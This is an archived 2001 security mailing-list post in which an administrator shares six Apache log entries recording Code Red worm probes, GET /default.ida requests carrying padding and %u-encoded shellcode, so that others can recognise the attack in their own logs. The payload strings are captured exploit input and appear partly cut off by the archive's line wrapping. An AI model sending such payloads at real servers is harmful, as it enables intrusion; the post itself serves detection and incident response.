> I'm running 1.8p1 and the .ida rule picked up all visits from the code red worm > which we started seeing this afternoon without issue. Below is the complete > packet if your interested. I am including 6 log entries from my apache system I got within the last hour. Maybe it will help someone see what it may look like in there logs. 205.238.121.1 - - [19/Jul/2001:11:39:32 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6! 8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%! 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 216.20.237.252 - - [19/Jul/2001:13:23:34 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u! 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00! 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 24.1.20.196 - - [19/Jul/2001:14:10:48 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u685! ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u5! b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 216.232.65.56 - - [19/Jul/2001:14:37:27 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6! 8%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%! 31b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 24.219.125.0 - - [19/Jul/2001:14:38:51 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u68! %ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u! 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" 207.212.91.163 - - [19/Jul/2001:14:42:42 +0000] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN! NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u! 58%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00! 531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 252 "-" "-" Just to give you a idea of how many systems are effected notice the times between scans. - zenomorph ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Jul 19 2001 - 16:29:59 PDT